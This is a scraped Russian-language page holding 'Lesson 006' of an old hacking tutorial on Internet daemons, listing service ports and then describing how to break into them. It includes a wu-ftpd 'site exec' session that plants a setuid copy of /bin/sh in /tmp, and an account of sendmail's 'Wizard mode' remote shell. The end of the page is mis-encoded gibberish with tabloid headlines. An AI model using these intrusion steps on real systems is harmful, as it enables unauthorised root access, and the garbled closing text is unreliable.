2211
| ЗНАКОМСТВА | UKA.ru | Gossip.ru |Библиотека бесплатно! | massovka | vaticancitystate.ru | взрывЧАТка From 24.11.97
Lesson 006
----------

Цель: Internet Daemons ;)

Как известно, Internet хосты используют TCP протокол для соединения и обмена
информацией. На ряду с ними используются еще некотрые дополнительные протоколы,
список и информация о которых доступна на Unix-системе в /etc/protocols.

В расположении сессиии (OSI model) или Internet (DOD Protocol Model) хосты об-
мениваются данными через порты, доступные для каждого определенного типа данных.
Каждый тип имеет свой определенный исходный и входной порт. Номера портов делят-
ся на два типа: постоянно-определенный и динамически-выделяемый. В системе Unix
постоянно-определенные порта описаны в /etc/services. Для более точного и под-
робного описания неплохо было бы просмотреть RFC(Request For Comments) 1700 
"Assigned Numbers" которые предлагает наиболее полный список. Динамически-выде-
ляемые порта определяются системой в зависимости от требований и состояний в 
момент определения.

Unix позволяет использовать соединения через постоянно-определенные порта с 
Internet daemons , что даст возможность получения соединения со всеми доступ-
ными сервисами.

Daemon программы практически всегда выполняются inetd (The Internet Daemon). 
Их описания хранятся в конфигурационном файле inted, /etc/inetd.conf. 

Многие daemons исполняются с получением привеллегиривонного root доступа. Это
дает возможность получить доступ к отдаленным системам.

Daemons в которых мы наиболее заинтересованы:

Сервис       Номер порта        Описание
------       -----------        --------
ftp              21             File Transfer [Control]
smtp             25             Simple Mail Transfer Protocol
tftp             69             Trivial File Transfer Protocol
finger           79             Finger
www-http         80             World Wide Web HTTP
sunrpc          111             SUN Remote Procedure Call
fln-spx         221             Berkeley rlogind with SPX auth
rsh-spx         222             Berkeley rshd with SPX auth
netinfo         716-719         NetInfo
ibm-res         1405            IBM Remote Execution Starter
nfs             2049            Network File System
x11             6000-6063       X Window System

rcp/rshd                        Remote Copy/Remote Shell Daemon
nis                             Network Information Services

Дальше, я сфокусирую свое внимание на определенных daemons, а именно на возмож-
ности их взлома.

ftp 21 File Transfer [Control]

ftp - протокол передачи данных. ftp-запросы обрабатываются FTP daemon, ftpd. 
wuarchive's ftpd версии выше 2.2 имеют функцию, благодаря которой вы можете
исполнить двоичный файл при помощи 'site exec' команды, вызовом ее с опреде-
ленным указанием пути с "../" в начале строки.Ниже приводится пример: 

Вход в систему с использованием ftp: 

220 uswest.com FTP server (Version wu-2.1(1) ready.
Name (uswest.com:waltman): waltman
331 Password required for waltman.
Password: jim
230 User waltman logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec cp /bin/sh /tmp/.tno"
200-cp /bin/sh /tmp/tno
ftp> quote "site exec chmod 6755 /tmp/.tno"
200-chmod 6755 /tmp/tno
ftp> quit
221 Goodbye.

smtp 25 Simple Mail Transfer Protocol

Почтовые атаки наиболее распространеные и старые атаки Internet хостов. Наиболее
используемый daemon - sendmail. В нем - самая слабая защита. Другие почтовые 
daemons включают в себя smail, MMDF и IDA sendmail. Sendmail имеет слишком много
возможностей взлома, чтобы их всех описать.

Наиболее используемая и исторически известная возможность - "Wizard Mode." В
Wizard mode я могу запросить shell через порт 25 (SMTP port). Новые системы не
имеют этой дыры. Чтобы выполнить это мы должны использовать telnet на порт 25,
ввести WIZ чтобы войти в Wizard mode и ввести пароль. Проблема заключается в 
том, что расшифрованный пароль сохранен. 

Wizard mode пароль в malloc памяти, следовательно он спрятан достаточно. Но ука-
затель указан на NULL: 

char    *wiz = NULL;

Из этого следует, что он находится в выделенной части.

PS. Thanx to Voyager[TNO]

123123
| ЗНАКОМСТВА | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | взрывЧАТка From 24.11.97
бОЕЛДПФ дОС:
уЙДЙФ рХФЙО ЪБ УФПМПН. рЙЫЕФ. чДТХЗ - УФХЛ Ч ДЧЕТШ.
- чПКДЙФЕ! - дЧЕТШ УМЕЗЛБ РТЙПФЛТЩЧБЕФУС, ОБ РПТПЗЕ - НБМЕОШЛБС ДЕЧПЮЛБ:
- йЪЧЙОЙФЕ, ЬФП ЪДЕУШ [ДБМШЫЕ]

хОЙЛБМШОЩЕ УОЙНЛЙ У дт рХЗБЮЕЧПК (15 ЖПФП)

оБФБЫБ лПТПМЕЧБ ВПМШЫЕ ОЕ УФЕУОСЕФУС (13 ЖПФП)


VAZHNO.RU

хОЙЛБМШОЩЕ УОЙНЛЙ У дт рХЗБЮЕЧПК (15 ЖПФП)

оБФБЫБ лПТПМЕЧБ ВПМШЫЕ ОЕ УФЕУОСЕФУС (13 ЖПФП)


VAZHNO.RU
uka.ru